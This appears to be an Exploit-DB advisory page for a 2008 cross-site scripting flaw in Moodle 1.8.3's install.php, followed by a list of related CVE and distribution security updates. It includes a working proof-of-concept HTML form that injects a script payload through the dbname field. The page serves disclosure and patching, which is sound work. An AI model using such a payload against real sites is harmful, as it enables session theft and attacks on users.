Lucene search
Hanno BockEDB-ID:31020HistoryJan 12, 2008 - 12:00 a.m.
Moodle 1.8.3 - 'install.php' Cross-Site Scripting
2008-01-1200:00:00
Hanno Bock
www.exploit-db.com
27
AI Score
7.4
Confidence
Low
source: https://www.securityfocus.com/bid/27259/info
Moodle is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
This issue affects versions prior to Moodle 1.8.4.
<form method="post" action="http://localhost/moodle/install.php"> <input type="hidden" name="stage" value="3"> <input type="text" name="dbname" value='"><script>alert(1)</script>'> <input type=submit> </form>Related
nessus
nessus
Fedora 7 : moodle-1.8.4-1.fc7 (2008-0627)
2008-01-16 00:00:00
openSUSE 10 Security Update : moodle (moodle-4964)
2008-02-05 00:00:00
Fedora 8 : moodle-1.8.4-1.fc8 (2008-0610)
2008-01-16 00:00:00
cvelist
cvelist
CVE-2008-0123
2008-01-12 01:00:00
packetstorm
packetstorm
moodleinstall-xss.txt
2008-01-12 00:00:00
openvas
openvas
Fedora Update for moodle FEDORA-2008-0610
2009-02-17 00:00:00
Fedora Update for moodle FEDORA-2008-0610
2009-02-17 00:00:00
Fedora Update for moodle FEDORA-2008-0627
2009-02-17 00:00:00
securityvulns
securityvulns
fedora
fedora
[SECURITY] Fedora 7 Update: moodle-1.8.4-1.fc7
2008-01-15 22:54:38
[SECURITY] Fedora 8 Update: moodle-1.8.4-1.fc8
2008-01-15 22:52:18
[SECURITY] Fedora 8 Update: moodle-1.8.5-1.fc8
2008-07-09 02:50:05
prion
prion
Cross site scripting
2008-01-12 01:46:00
redhatcve
redhatcve
CVE-2008-0123
2019-10-04 21:36:16
cve
cve
CVE-2008-0123
2008-01-12 01:46:00
ubuntucve
ubuntucve
CVE-2008-0123
2008-01-12 00:00:00
nvd
nvd
CVE-2008-0123
2008-01-12 01:46:00